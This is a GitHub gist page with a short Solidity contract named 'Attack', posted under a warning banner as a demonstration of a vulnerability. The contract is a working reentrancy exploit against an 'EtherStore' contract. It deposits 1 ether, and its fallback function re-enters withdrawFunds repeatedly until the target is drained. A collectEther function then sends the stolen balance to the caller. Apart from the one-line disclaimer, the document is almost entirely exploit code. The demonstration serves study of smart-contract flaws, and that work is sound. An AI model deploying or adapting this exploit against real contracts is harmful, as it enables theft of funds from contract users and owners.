Created
July 21, 2018 18:20
-
-
Save vasa-develop/e556e34c2c4b5ba9220135eec4eefb70 to your computer and use it in GitHub Desktop.
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "EtherStore.sol"; | |
| contract Attack { | |
| EtherStore public etherStore; | |
| // intialise the etherStore variable with the contract address | |
| constructor(address _etherStoreAddress) { | |
| etherStore = EtherStore(_etherStoreAddress); | |
| } | |
| function pwnEtherStore() public payable { | |
| // attack to the nearest ether | |
| require(msg.value >= 1 ether); | |
| // send eth to the depositFunds() function | |
| etherStore.depositFunds.value(1 ether)(); | |
| // start the magic | |
| etherStore.withdrawFunds(1 ether); | |
| } | |
| function collectEther() public { | |
| msg.sender.transfer(this.balance); | |
| } | |
| // fallback function - where the magic happens | |
| function () payable { | |
| if (etherStore.balance > 1 ether) { | |
| etherStore.withdrawFunds(1 ether); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment